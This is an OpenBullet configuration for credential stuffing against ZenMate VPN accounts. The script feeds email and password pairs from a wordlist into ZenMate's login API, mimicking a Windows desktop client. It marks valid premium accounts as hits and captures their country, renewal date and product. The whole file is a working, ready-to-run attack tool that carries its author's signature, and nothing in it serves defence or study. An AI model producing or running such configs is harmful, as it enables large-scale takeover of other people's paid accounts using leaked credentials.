[SETTINGS]
{
  "CreatorLK": "OB-23f244d14075df106e85c6a72d0f039d-LoliKEY",
  "Name": "Zenmate.Tranks",
  "SuggestedBots": 50,
  "LastModified": "2019-05-01T20:30:48.9322629+02:00",
  "AdditionalInfo": "",
  "KeysDB": "",
  "LocalKeysDB": "",
  "isWtoEdit": false,
  "Author": "Tranks",
  "Version": "1.2.2.4",
  "IgnoreResponseErrors": false,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#Log_in REQUEST POST "https://api.zcdn.de/v2/devices" 
  CONTENT "auth_method=user&auth_id=<USER>&auth_secret=<PASS>&install_id=f9834131-0a1a-4ae7-958d-5dcc70e94bf8&os_name=Windows&os_ver=Microsoft%20Windows%20NT%2010.0.17134.0&client_name=Windows&client_ver=3.5.0.20&client_env=windows10&locations_scope=true&client_type=desktop&show_premium=true" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: RestSharp/105.2.3.0" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#CHECK KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Success OR 
    KEY "\"is_premium\":true" 
  KEYCHAIN Failure OR 
    KEY "\"Invalid email or password\"" 
  KEYCHAIN Custom "FREE" OR 
    KEY "\"is_premium\":false" 

#TR PARSE "<SOURCE>" LR "\"subscription_country\":\"" "\"" -> CAP "Country" 

#EN PARSE "<SOURCE>" LR "\"premium_expires_at\":\"" "\",\"partner_id\"" -> CAP "Renew" 

#KS PARSE "<SOURCE>" LR "active_product\":\"" "\"" -> CAP "Product" "" " >> True |By.Tranks" 

